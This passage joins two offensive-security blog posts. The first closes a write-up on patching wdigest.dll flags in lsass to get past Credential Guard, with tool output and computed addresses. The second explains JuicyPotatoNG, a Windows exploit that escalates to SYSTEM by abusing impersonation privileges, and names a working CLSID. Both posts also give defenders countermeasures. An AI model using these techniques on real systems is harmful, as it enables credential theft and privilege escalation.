  wprintf(L"Base address of wdigest.dll: 0x%016p\r\n", hModule);
  FreeLibrary(hModule);
}

After adding this to my own PoC and calculating the addresses, here is what I get. Not bad!

C:\Temp>WDigestCredGuardPatch.exe
Exactly one match found, good to go!
Matched code at 0x00001839: 39 1d 75 49 03 00 8b 05 c3 43 03 00
Offset of g_fParameter_UseLogonCredential: 0x000361b4
Offset of g_IsCredGuardEnabled: 0x00035c08
Base address of wdigest.dll: 0x00007FFEE32B0000
Address of g_fParameter_UseLogonCredential: 0x00007ffee32e61b4
Address of g_IsCredGuardEnabled: 0x00007ffee32e5c08

We can confirm that the base address of wdigest.dll is the same by inspecting the memory of the lsass.exe process using Process Hacker for instance.

Conclusion

The first thing I want to say is thank you to @N4k3dTurtl3 for the initial post on this subject. I really liked the simplicity and efficiency of this trick. It always amazes me how this kind of hack can defeat really advanced protections such as Credential Guard.

Now, the question is: as a pentester (or a red teamer), should you use the technique I described in this post? The idea of not having to rely on hardcoded offsets, and therefore running code that is version-independent, is attractive. However, it might also be a bit riskier, as pattern matching is not an exact science. To address this, I implemented a safeguard which consists of ensuring that the pattern is matched exactly once. This leaves us with only one potential false positive: the pattern could be matched exactly once on a random portion of code, which seems rather unlikely. The only real risk I see is that Microsoft could slightly change the implementation so that my pattern simply no longer works.

As for defenders, enabling Credential Guard should not stop you from enabling LSA Protection as well. We all know that it can be completely bypassed, but this operation has a cost for an attacker. It requires running code in the kernel or using a sophisticated userland bypass, both of which create avenues for detection. As rightly said by @N4k3dTurtl3:

The goal is to increase the cost in time, effort, and tooling […] thus making your network less appealing as a target and increasing opportunities for detection and response.

Lastly, this was a cool little challenge, not too difficult, and as always I learned a few things along the way, the perfect recipe. Oh, and if you have read this far, you can find my PoC here.


Giving JuicyPotato a second chance: JuicyPotatoNG

Well, it’s been a long time ago since our beloved JuicyPotato has been published. Meantime things changed and got fixed (backported also to Win10 1803/Server2016) leading to the glorious end of this tool which permitted to elevate to SYSTEM user by abusing impersonation privileges on Windows systems.

With Juicy2 it was still somehow possible to circumvent the protections Microsoft implemented to stop this evil abuse, but there were some constraints, for example the need for an external non-Windows machine to redirect the OXID resolution requests.

The subset of CLSIDs that could be abused was very restricted (most of them would only give us an Identification token); in fact, it worked only on Windows 10/11 versions with the "ActiveX Installer Service". The "PrintNotify" service was also a good candidate (it is enabled on Windows Server versions too), but the caller needed to belong to the "INTERACTIVE" group, which in practice limited the abuse from service accounts.

When James Forshaw published his post about relaying Kerberos DCOM authentication, which is also an evolution of our "RemotePotato0", we reconsidered these limitations, given that he demonstrated it was possible to do everything on the same local machine.

The “INTERACTIVE” constraint could also be easily bypassed as demonstrated by @splinter_code’s magic RunasCs tool.

Putting all the pieces together was not that easy and I have to admit I’m really lazy in coding, so I asked my friend (and coauthor in the *potato saga) @splinter_code for help. He obviously accepted the engagement 🙂

How we implemented it

The first thing we implemented was Forshaw's "trick" for resolving OXID requests to a local COM server on a randomly selected port.
We spoofed the image filename of our running process to "System" in order to bypass the Windows Firewall restrictions (if enabled), and decided to use port 10247 as the default port, given that in our tests this port was generally available locally to a low-privileged user.

When we want to activate a COM object we need to take into consideration the security permissions configured. In our case the PrintNotify service had the following Launch and Activation permission:

Given that the INTERACTIVE group was needed for activating the PrintNotify object (identified by the CLSID parameter), we used the following “trick”:

When using the LogonUser() API call with logon type 9 (NewCredentials), LSASS builds a copy of our token and adds the INTERACTIVE SID along with others, e.g. the SID of the newly created logon session. Because we created this token through LogonUser() with explicit credentials, we don't need impersonation privileges to impersonate it. Of course, the credentials are fake, but that doesn't matter as they will only ever be used over the network, while the original caller identity is used locally.

Last but not least, we needed to capture the authentication in order to impersonate the SYSTEM user. The most obvious solution was to write our own RPC server listening on port 10247 and then simply call RpcImpersonateClient().
However, this was not possible: when we register our RPC server binding information through RpcServerUseProtseqEp(), the RPC runtime binds to the specified port, and this port then appears "busy" to anyone else trying to use it.
We could have implemented some hack to enumerate the socket handles in our process and hijack the socket, but that would have been an unnecessarily heavy load of code.

So we decided to implement an SSPI hook on AcceptSecurityContext() function which would allow us to intercept the authentication and get the SYSTEM token to impersonate:

Using this approach through an SSPI hook, instead of relying on RpcImpersonateClient(), has an additional advantage: it makes this exploit work even when holding only SeAssignPrimaryTokenPrivilege. As you may know, RpcImpersonateClient() requires your process to hold SeImpersonatePrivilege, so relying on it would have added an unnecessary limitation.

The JuicyPotatoNG TOOL

The source code of JuicyPotatoNG (C++, Visual Studio 2019) can be downloaded here.

The Port problem

As mentioned, we chose "10247" as the default COM server port, but sometimes you can run into a situation where the port is not available. A simple PowerShell script enumerating the ports already in use will help you find the available ones; just choose one that is free and you're done.

Countermeasures

Be aware that Microsoft does not consider this a "security boundary" violation. Abusing impersonation privileges is expected behavior 😉

So what can we do in order to protect ourselves?

First of all, service accounts and accounts holding these privileges should be protected by strong passwords and strict access policies and, in the case of service accounts, "virtual service accounts" or "group Managed Service Accounts" should be used. You could also consider removing unnecessary privileges, as described in one of my posts, but this is not totally secure either…

In this particular case, just disabling the "ActiveX Installer Service" and the "Print Notify Service" will inhibit our exploit (and has no serious impact). But remember, there could also be third-party CLSIDs with SYSTEM impersonation…

Conclusions

This post is a demonstration that you should never give up and always push the limits one step further 🙂 … and we have other *potato tools ready, so stay tuned!

Special thanks to the original “RottenPotato” developers, Giuseppe Trotta, and as usual to James Forshaw

That’s all 😉

Update

It seems that Microsoft "fixed" the INTERACTIVE trick and JuicyPotatoNG stopped working. But guess what: there is another CLSID which does not require the INTERACTIVE group and impersonates SYSTEM: {A9819296-E5B3-4E67-8226-5E72CE9E1FB7}

It runs only on Windows 11 / Server 2022, though…

Authors of this post: @decoder_it, @splinter_code
